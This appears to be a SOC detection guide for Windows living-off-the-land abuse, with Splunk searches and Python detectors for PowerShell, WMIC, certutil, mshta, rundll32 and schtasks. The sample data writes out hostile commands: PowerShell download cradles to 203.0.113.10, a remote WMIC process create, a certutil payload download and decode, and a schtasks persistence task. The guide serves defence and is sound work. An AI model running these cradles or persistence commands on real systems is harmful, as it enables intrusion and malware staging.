SOC detection Signatures

APTs

PowerShell

PowerShell is a scripting engine used for administration and automation in Windows systems.

Attackers use PowerShell because it can run scripts directly in memory without writing files to disk, automate many system actions, interact with the network, and bypass the execution policy (which is a safety setting rather than a security boundary: -ExecutionPolicy Bypass on the command line is enough to defeat it). Common purposes include downloading payloads, gathering information, running code stealthily, or modifying system settings.

LOL via PowerShell

The example commands show three patterns. The first uses IEX with DownloadString, the classic download cradle: it fetches a script from a remote server and runs it immediately in memory, avoiding disk artefacts and slowing detection. The second uses -EncodedCommand, which takes the script as base64 of its UTF-16LE text, so human reviewers and simple log filters see only a blob unless they decode it; PowerShell also accepts unambiguous abbreviations of the switch (-e, -ec, -enc), which keyword filters on the full switch name miss. The third downloads file.exe to disk and executes it, leaving the file artefact the first two avoid.

An example detection is shown below. Sysmon Event ID 1 and Security Event ID 4688 carry the command line (4688 only if command-line auditing is enabled), but Event ID 4104 (script block logging) records the script in ScriptBlockText rather than CommandLine, so it needs its own clause; the two fields are merged before the stats so encoded or file-based scripts are grouped with command-line cradles:

(index=wineventlog OR index=sysmon) (((EventCode=4688 OR EventCode=1) (CommandLine="*powershell*IEX*" OR CommandLine="*powershell*-EncodedCommand*" OR CommandLine="*powershell* -e *" OR CommandLine="*powershell* -ec *" OR CommandLine="*powershell* -enc *" OR CommandLine="*powershell*-Exec* Bypass*" OR CommandLine="*Invoke-WebRequest*" OR CommandLine="*DownloadString*" OR CommandLine="*Invoke-RestMethod*")) OR (EventCode=4104 (ScriptBlockText="*IEX*" OR ScriptBlockText="*DownloadString*" OR ScriptBlockText="*Invoke-WebRequest*" OR ScriptBlockText="*Invoke-RestMethod*"))) | eval cmd=coalesce(CommandLine, ScriptBlockText) | stats count values(Host) as hosts values(User) as users values(ParentImage) as parents by cmd
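The following is an added example, not code from the original page, showing the -EncodedCommand point in working form: it tokenises PowerShell command lines taken from process-creation records, recognises the switch and its abbreviations, base64-decodes the UTF-16LE payload and runs the same IEX/DownloadString indicators over both the visible command line and the decoded script, so the base64 wrapper no longer hides the intent. Field names (Host, User, ParentImage, CommandLine) follow Sysmon Event ID 1 as used in the search above; the records, host names, users and the 203.0.113.10 URL are constructed sample data, not real telemetry.

```python
"""Added example: inspect PowerShell command lines from process-creation records,
decode -EncodedCommand payloads and flag download cradles (IEX, DownloadString...).
Records are dicts with the Sysmon Event ID 1 field names used in the Splunk searches."""
import base64
import re

# Strong indicators: download cradles and their common aliases.
CRADLE_RE = re.compile(
    r"\biex\b|invoke-expression|downloadstring|downloadfile|invoke-webrequest"
    r"|\biwr\b|invoke-restmethod|\birm\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)
# Weak indicators: harmless alone, but almost always present in cradles
# (-ep/-exec/-ExecutionPolicy Bypass, -w/-WindowStyle Hidden).
WEAK_RE = re.compile(r"-e[a-z]*\s+bypass|-w[a-z]*\s+hidden", re.IGNORECASE)
TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def is_encoded_switch(tok):
    """PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    name = tok[1:].lower()
    return len(tok) > 1 and tok[0] in "-/" and "encodedcommand".startswith(name)


def extract_encoded_command(cmdline):
    """Return the base64 blob following an -EncodedCommand switch, or None."""
    toks = tokenize(cmdline)
    for switch, value in zip(toks, toks[1:]):
        if is_encoded_switch(switch):
            return value
    return None


def decode_encoded_command(blob):
    """The blob is base64 of the script's UTF-16LE text; None if it is malformed."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def encode_for_powershell(script):
    """Inverse of decode_encoded_command; used here only to build the sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze(event):
    """Score one record: high = cradle seen, low = only weak/encoded hints, none otherwise."""
    cmd = event["CommandLine"]
    blob = extract_encoded_command(cmd)
    decoded = decode_encoded_command(blob) if blob is not None else None
    # Match against the visible command line AND the decoded script, so base64
    # cannot hide DownloadString from the rule the way it hides it from a grep.
    haystack = cmd if decoded is None else cmd + "\n" + decoded
    strong = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(haystack)})
    weak = sorted({m.group(0).lower() for m in WEAK_RE.finditer(haystack)})
    severity = "high" if strong else ("low" if weak or blob is not None else "none")
    return {"host": event["Host"], "user": event["User"], "parent": event["ParentImage"],
            "encoded": blob is not None, "decoded": decoded,
            "indicators": strong + weak, "severity": severity}


def analyze_events(events):
    return [analyze(e) for e in events if "powershell" in e["CommandLine"].lower()]


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"Host": "WS01", "User": "CORP\\alice", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "' + CRADLE + '"'},
    {"Host": "WS02", "User": "CORP\\bob",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(CRADLE)},
    {"Host": "SRV01", "User": "CORP\\svc_backup", "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"Host": "WS03", "User": "CORP\\carol", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
]

if __name__ == "__main__":
    for r in analyze_events(SAMPLE_EVENTS):
        print(r["severity"].upper(), r["host"], r["indicators"], (r["decoded"] or "")[:50])
```

The second sample is the interesting one: its command line contains none of the keywords the search looks for, yet after decoding it scores the same as the plain-text cradle from the first record, while the backup script with only -ExecutionPolicy Bypass stays at low severity for an analyst to triage against the parent process.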

WMIC

WMIC (Windows Management Instrumentation Command-line) lets administrators query and manage local or remote Windows systems over WMI. Because the Win32_Process class exposes a Create method, the same tool can start a process on any host the caller has WMI rights on, which is how threat actors use it for remote command execution.

Attackers use WMIC to execute commands or create processes remotely, collect system information, or establish persistence without dropping external binaries. It blends with admin behaviour and is often allowed in restricted environments. Two caveats for detection: wmic.exe is deprecated and no longer installed by default on recent Windows 11 builds, so on current systems its mere presence is unusual; and the same WMI calls can be made without wmic.exe at all (for example from PowerShell with Invoke-WmiMethod or Invoke-CimMethod), so the WMI service side, not just the wmic.exe command line, needs coverage.

LOL via WMIC

In the first WMIC command, the operator targets a remote host with /node: and asks it to create a new process through Win32_Process Create. That process is a PowerShell instance that downloads and executes a remote script, so WMIC acts as a remote launcher; on the target host the PowerShell process appears as a child of WmiPrvSE.exe (the WMI provider host), not of wmic.exe, which never runs there. In the second command, WMIC queries the remote system for its running processes and command lines, returning structured information useful for reconnaissance across hosts. In the third command, the local process call create is used to spawn notepad.exe on the same machine; the optional hiding flag in the example demonstrates how an attacker might try to make a spawned process less visible.

An example detection alert can be found below. The command-line clauses catch the attacker's side (wmic.exe on the source host); the ParentImage clause catches the target's side, where the payload is spawned by WmiPrvSE.exe with no wmic.exe in the chain:

(index=sysmon OR index=wineventlog) (EventCode=1 OR EventCode=4688) (CommandLine="*\\wmic.exe*process call create*" OR CommandLine="*wmic /node:* process call create*" OR CommandLine="*wmic*process get Name,CommandLine*" OR (ParentImage="*\\WmiPrvSE.exe" (Image="*\\powershell.exe" OR Image="*\\cmd.exe"))) | stats count values(Host) as hosts values(User) as users values(ParentImage) as parents by CommandLine

Certutil

Certutil is a Microsoft-signed command-line tool for managing certificates and the certificate store. It can also fetch a URL with -urlcache and encode or decode base64 with -encode and -decode, turning text blobs into binaries and back. Attackers use it because it is signed by Microsoft and common in admin workflows: it can place files on disk without curl or similar software, and it slips past simple blocking rules that only look for known downloaders.

Threat actors use Certutil to download files, decode base64-encoded payloads, or disguise malicious code as legitimate certificate operations. Its network and file-handling capabilities make it a versatile tool for staging payloads or reconstructing encoded scripts. Note that base64 is encoding, not encryption: anyone holding the blob can decode it, which is also what lets an analyst recover the payload from a captured encoded.b64.

LOL via Certutil

In the first certutil command, the -urlcache -split -f flags instruct certutil to fetch the remote URL and write it to the specified local path; the result is a file dropped on disk that can be executed later. Certutil also keeps a copy of fetched content in the user's CryptnetUrlCache folder, a useful forensic artefact when the dropped file has since been deleted. In the second command, certutil reads the base64 text file encoded.b64, decodes it and writes the resulting binary to decoded.exe, so an attacker can transport a binary as text and reconstruct it on the host. In the third command, certutil encodes an existing binary into base64 text stored in payload.b64, which can obfuscate the payload during staging or transit. Certutil accepts its switches with either - or /, so detections keyed on the exact -urlcache ... -f spelling should allow for both forms.

Example alert. Security Event 4663 (file object access) carries no command line and is not useful here; the urlcache match is kept loose because -split is optional and the switches also work with a / prefix:

(index=sysmon OR index=wineventlog) (EventCode=1 OR EventCode=4688) (Image="*\\certutil.exe" OR CommandLine="*certutil*") (CommandLine="*urlcache*" OR CommandLine="* -decode *" OR CommandLine="* /decode *" OR CommandLine="* -encode *" OR CommandLine="* /encode *") | stats count values(Host) as hosts values(User) as users values(ParentImage) as parents by CommandLine

MSHTA

Mshta runs HTML Application (HTA) files, which can contain VBScript or JScript. An HTA runs outside the browser sandbox with the privileges of the user who launched it, and mshta.exe is a signed Microsoft binary, so it is a convenient proxy for executing script from a remote URL, a local file, or an inline javascript: or vbscript: URI passed on the command line.

LOL via Mshta

In the first mshta command, mshta loads the HTA from a remote server and executes its content in the context of the logged-on user. In the second, mshta is passed an inline javascript: URI that creates a WScript.Shell ActiveX object and uses it to run PowerShell, which then starts a process; this shows how inline script can spawn system commands with no intermediate file on disk. In the third, mshta runs a local HTA file, useful when the attacker delivers the HTA as an attachment or drops it on a shared drive.

Example alert. 4688 events live in the Security log, so both indexes are searched; the .hta pattern allows a closing quote after the path, and vbscript: URIs are covered alongside javascript:

(index=sysmon OR index=wineventlog) (EventCode=1 OR EventCode=4688) Image="*\\mshta.exe" (CommandLine="*http*://*" OR CommandLine="*javascript:*" OR CommandLine="*vbscript:*" OR CommandLine="*.hta*") | stats count by host, user, ParentImage, CommandLine

Rundll32

Rundll32 loads a DLL and calls one of its exported functions (rundll32 <dll>,<export> [arguments]). It is a signed Microsoft binary that legitimate software invokes constantly, so detection hinges on where the DLL lives and which export is called rather than on rundll32.exe itself.

LOL via Rundll32

In the first rundll32 command, rundll32 loads the specified DLL and calls its exported Start function, which runs the DLL's code. In the second, rundll32 invokes url.dll with FileProtocolHandler and a remote URL, causing the system's URL handler to open the remote content, which can bootstrap further activity. In the third, rundll32 calls a crafted export in a DLL placed in a temporary directory, which may execute embedded loader logic or shellcode from a file in a writable location.

Example alert. Sysmon Event ID 7 (image load) records the loaded DLL in ImageLoaded rather than CommandLine, so it does not match command-line patterns and would need a separate search on that field; the query below stays with process creation:

(index=sysmon OR index=wineventlog) (EventCode=1 OR EventCode=4688) Image="*\\rundll32.exe" (CommandLine="*\\Users\\Public\\*" OR CommandLine="*url.dll,FileProtocolHandler*" OR CommandLine="*\\Windows\\Temp\\*") | stats count by host, user, ParentImage, CommandLine

Scheduled tasks (schtasks / Task Scheduler)

Task Scheduler is a built-in Windows automation facility; it lets administrators run programs or scripts at specified times, on events such as logon, or on a repeating schedule. Tasks have a name, a trigger (when to run), an action (what to run), and an optional run-as account and conditions. Because it is a standard admin facility, task activity is accepted as normal and is often allowed by policy, making it a valuable mechanism for both legitimate operations and attacker persistence. Note that Security Event 4698 (task created) is only written when the Audit Other Object Access Events subcategory is enabled, and that every registered task is stored as XML under C:\Windows\System32\Tasks, where an analyst can read the exact action of a suspicious task. Attackers create or modify tasks to achieve persistence across reboots, to run code at user logon or on a regular cadence, or to quickly re-launch payloads after they remove other artefacts. They often pick task names that look benign, for example WindowsUpdate or Maintenance, to avoid drawing attention. Tasks can run PowerShell, signed tools, or local scripts.

LOL via Task Scheduler

In the first schtasks command, a task named WindowsUpdate is created to run at logon. Its action runs PowerShell, which downloads and executes a remote script on each user logon, providing persistence. In the second command, a daily task named DailyJob is scheduled to run a local script at 00:05 each day; this can automate repeated harmful actions such as scheduled encryption or staged data collection. In the third command, the attacker triggers the named task to run immediately, invoking its configured action on demand.

Example alert. In SPL, OR binds tighter than the implicit AND, so the two event sources are parenthesised separately; stats drops events that lack any by-field, so TaskName (present on 4698/4699) and CommandLine (present on process events) are filled first. On recent Windows 10 and Windows 11 builds taskeng.exe is no longer used, the Schedule service host (svchost.exe) spawns the task action directly, so an Image match on taskeng.exe finds nothing there:

((index=wineventlog (EventCode=4698 OR EventCode=4699)) OR ((index=sysmon OR index=wineventlog) (EventCode=1 OR EventCode=4688) (CommandLine="*schtasks* /Create*" OR CommandLine="*schtasks* /Run*"))) | fillnull value="-" TaskName CommandLine | stats count by host, user, EventCode, TaskName, CommandLine
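As an added example covering the WMIC, Certutil, MSHTA, Rundll32 and Task Scheduler detections above (not code from the original page), the Python below applies the same indicators to constructed Sysmon Event ID 1-style records, but normalises the switch prefix (- or /) and case, checks the target-side parent (WmiPrvSE.exe) for remote WMIC execution, and extracts the task name and action from schtasks /Create so the analyst sees what the task actually runs. The host names, users, paths and the 203.0.113.x addresses are made up; the technique labels are this example's own.

```python
"""Added example: rule logic for the WMIC, certutil, mshta, rundll32 and schtasks
detections, run over constructed Sysmon Event ID 1-style records (Image, ParentImage,
CommandLine, Host, User). Switch prefixes (- or /) and case are normalised so variants
the SPL wildcards miss (certutil /urlcache, -urlcache without -split) still match."""
import ntpath
import re

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
USER_WRITABLE = ("\\users\\public\\", "\\windows\\temp\\", "\\appdata\\", "\\programdata\\")
TASK_ACTION_RE = re.compile(r"powershell|mshta|rundll32|certutil|wmic|\.(ps1|hta|vbs|js|bat)\b", re.I)

def tokens(cmdline):
    """Split a Windows command line, keeping quoted arguments whole (quotes stripped)."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]

def switches(toks):
    """Lower-cased switch names after the image token; - and / both accepted, :value dropped."""
    return {t[1:].split(":", 1)[0].lower() for t in toks[1:] if len(t) > 1 and t[0] in "-/"}

def value_after(toks, name):
    """Argument following switch `name` (e.g. /TR "cmd"), or None."""
    for switch, value in zip(toks, toks[1:]):
        if len(switch) > 1 and switch[0] in "-/" and switch[1:].lower() == name:
            return value
    return None

def check(event):
    """Return (technique, detail) for one process-creation record, or None if benign."""
    img = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    cmd = event["CommandLine"]
    toks, low = tokens(cmd), cmd.lower()
    sw = switches(toks)
    # Target-side view of 'wmic /node:... process call create': the payload is a child
    # of the WMI provider host, and wmic.exe itself never appears on that machine.
    if parent == "wmiprvse.exe" and img in ("powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe"):
        return "wmi_remote_exec", f"{img} spawned by WmiPrvSE.exe: {cmd}"
    if img == "wmic.exe":
        if "process call create" in re.sub(r"\s+", " ", low):
            node = next((t.split(":", 1)[1] for t in toks if t.lower().startswith("/node:")), None)
            return ("wmic_remote_create" if node else "wmic_local_create"), f"node={node or 'local'} payload={toks[-1]}"
        if "process" in low and "get" in low and "commandline" in low:
            return "wmic_process_recon", cmd
    if img == "certutil.exe":
        if "urlcache" in sw:
            url = next((t for t in toks if "://" in t), "?")
            return "certutil_download", f"url={url} out={toks[-1]}"
        if "decode" in sw or "encode" in sw:
            return "certutil_base64", cmd
    if img == "mshta.exe" and len(toks) > 1:
        arg = toks[1].lower()
        if arg.startswith(("http://", "https://", "javascript:", "vbscript:")) or arg.endswith(".hta"):
            return "mshta_script_exec", cmd.split(None, 1)[1]
    if img == "rundll32.exe" and len(toks) > 1:
        if "url.dll,fileprotocolhandler" in low.replace(" ", "") or any(d in toks[1].lower() for d in USER_WRITABLE):
            return "rundll32_suspicious_dll", toks[1]
    if img == "schtasks.exe":
        if "create" in sw and TASK_ACTION_RE.search(value_after(toks, "tr") or ""):
            return "schtasks_create_lolbin", f"tn={value_after(toks, 'tn')} tr={value_after(toks, 'tr')}"
        if "run" in sw:
            return "schtasks_run", f"tn={value_after(toks, 'tn')}"
    return None

def run(events):
    """Apply check() to every record and return the alerts with host/user context."""
    alerts = []
    for e in events:
        hit = check(e)
        if hit:
            alerts.append({"host": e["Host"], "user": e["User"], "technique": hit[0], "detail": hit[1]})
    return alerts

def ev(host, image, parent, cmd, user="CORP\\alice"):
    return {"Host": host, "User": user, "Image": image, "ParentImage": parent, "CommandLine": cmd}

SYS32 = "C:\\Windows\\System32\\"
CRADLE = "powershell -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1'))"
SAMPLE_EVENTS = [  # constructed records, not real telemetry; 203.0.113.x is documentation address space
    ev("WS01", SYS32 + "wbem\\wmic.exe", SYS32 + "cmd.exe", f'wmic /node:203.0.113.20 /user:CORP\\admin process call create "{CRADLE}"'),
    ev("SRV02", SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe", SYS32 + "wbem\\WmiPrvSE.exe", CRADLE),
    ev("WS01", SYS32 + "wbem\\wmic.exe", SYS32 + "cmd.exe", "wmic process call create notepad.exe"),
    ev("WS01", SYS32 + "wbem\\wmic.exe", SYS32 + "cmd.exe", "wmic /node:203.0.113.20 process get Name,CommandLine"),
    ev("WS02", SYS32 + "certutil.exe", SYS32 + "cmd.exe", "certutil.exe /urlcache /f http://203.0.113.10/p.exe C:\\Users\\Public\\p.exe"),
    ev("WS02", SYS32 + "certutil.exe", SYS32 + "cmd.exe", "certutil -decode C:\\Users\\Public\\encoded.b64 C:\\Users\\Public\\decoded.exe"),
    ev("WS03", SYS32 + "mshta.exe", "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
       'mshta.exe javascript:a=new ActiveXObject("WScript.Shell");a.Run("powershell -nop -c calc");close();'),
    ev("WS03", SYS32 + "rundll32.exe", SYS32 + "cmd.exe", "rundll32.exe C:\\Windows\\Temp\\loader.dll,Start"),
    ev("WS04", SYS32 + "schtasks.exe", SYS32 + "cmd.exe", f'schtasks /Create /TN WindowsUpdate /SC ONLOGON /TR "{CRADLE}" /RU SYSTEM /F'),
    ev("WS04", SYS32 + "schtasks.exe", SYS32 + "cmd.exe", "schtasks /Run /TN WindowsUpdate"),
    ev("WS05", SYS32 + "rundll32.exe", "C:\\Windows\\explorer.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for a in run(SAMPLE_EVENTS):
        print(a["host"], a["user"], a["technique"], a["detail"][:70])
```

The last record, a legitimate shell32.dll control-panel call, produces no alert, which is the point of keying rundll32 detection on the DLL location rather than the binary; the second record shows why the WMIC rule needs the WmiPrvSE.exe parent check, since the target host never logs a wmic.exe command line at all.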

The above are some examples of built-in Windows utilities that can be used, as shown, to download and execute files and to encode payloads, but attackers can draw on a much wider set of signed binaries and scripts. As analysts, we need to keep analysing new techniques and updating our detections to catch this activity.
